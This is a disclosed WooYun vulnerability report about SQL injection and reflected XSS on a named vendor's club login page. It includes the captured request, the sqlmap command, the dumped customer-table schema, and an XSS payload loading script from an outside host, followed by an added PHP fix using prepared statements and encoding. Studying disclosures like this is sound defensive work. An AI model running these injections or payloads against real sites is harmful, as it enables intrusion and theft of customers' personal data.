WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
2015-02-10: Details reported to the vendor; awaiting vendor handling.
2015-02-15: The vendor chose to ignore the vulnerability; details disclosed to the public.
The site has a SQL injection point and a reflected XSS.
The username parameter is vulnerable to POST injection. Submitting arbitrary data in the login form and capturing the request gives the following:
<code>
POST /club_login.php HTTP/1.1
Host: www.oppodigital.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.oppodigital.com.cn/club_login.php
Cookie: pgv_pvi=7487544320; __utma=42439803.2032898508.1423192596.1423192596.1423201653.2; __utmz=42439803.1423192596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3qdpr4hg9eqpam1rp4grvum5h1; pgv_si=s2809327616; __utmb=42439803.2.10.1423201653; __utmc=42439803
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

username=admin&password=admin&act=club&login=%E7%99%BB%E5%BD%95
</code>
http://www.oppodigital.com.cn//showroom.php?act=get_store&sell_district_id=1
Run it through sqlmap: blind injection.
Injection command: sqlmap.py -r [captured request file] -p username --dbs --level 3
<code>
Database: oppo_store
Table: bd_club_user
[24 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| address           | varchar(512)     |
| birthday          | datetime         |
| city              | varchar(128)     |
| connection_type   | varchar(512)     |
| dateline          | int(10) unsigned |
| e_mail            | varchar(512)     |
| education         | varchar(128)     |
| marriage_status   | char(1)          |
| media             | varchar(512)     |
| mobile_phone      | varchar(32)      |
| password          | varchar(64)      |
| personal_income   | varchar(128)     |
| profession        | varchar(128)     |
| province          | varchar(128)     |
| purchase_reason   | varchar(512)     |
| recommended_email | varchar(512)     |
| sex               | char(1)          |
| status            | char(1)          |
| tel_phone         | varchar(32)      |
| true_name         | varchar(128)     |
| type              | varchar(512)     |
| u_id              | int(10) unsigned |
| user_name         | varchar(128)     |
| zipcode           | varchar(16)      |
+-------------------+------------------+
</code>
http://www.oppodigital.com.cn/club_login.php
POST the following data: act=club&login=%e7%99%bb%e5%bd%95&password=acUn3t1x&username="/><script src=http://t.cn/RwzPqom></script>
Filter the input...
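An added example, not taken from the report or from the vendor's code, of handling the two reported inputs safely in PHP: a prepared statement for the username lookup and context-aware encoding when the value is echoed back. Assumptions: the function names are hypothetical, the username is reflected into an input's value attribute, the table and column names follow the sqlmap output above, and an in-memory SQLite database stands in for the real backend.

```php
<?php
// Added example: hardened handling of the username parameter.
// For contrast, the hypothetical pattern that produces the reported
// injection is string concatenation into the SQL text, e.g.
//   "... WHERE user_name = '" . $_POST['username'] . "'"

function find_user(PDO $db, string $username): ?array
{
    // The placeholder keeps the username out of the SQL text entirely,
    // so quotes in it are data and cannot change the statement.
    $stmt = $db->prepare(
        'SELECT u_id, user_name FROM bd_club_user WHERE user_name = :name'
    );
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function render_login_field(string $username): string
{
    // Encode for an HTML attribute context: ENT_QUOTES covers both quote
    // characters, so the value cannot close the attribute or the tag.
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $safe . '"/>';
}

// Constructed sample data (stand-in for the real database).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bd_club_user
           (u_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)');
$db->exec("INSERT INTO bd_club_user (user_name, password)
           VALUES ('admin', 'constructed-hash')");

// Constructed inputs: a normal name, a name containing a quote, and the
// username value from the reflected-XSS request in the report.
$inputs = [
    'admin',
    "o'brien",
    '"/><script src=http://t.cn/RwzPqom></script>',
];
foreach ($inputs as $in) {
    $user = find_user($db, $in);
    echo $user ? "found u_id={$user['u_id']}" : 'no such user', "\n";
    echo render_login_field($in), "\n";
}
```

Against a MySQL backend, also set `PDO::ATTR_EMULATE_PREPARES` to `false` and declare the connection charset in the DSN so the driver uses server-side prepared statements.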
Severity: No impact (ignored by vendor)
Ignored at: 2015-02-15 12:08
None yet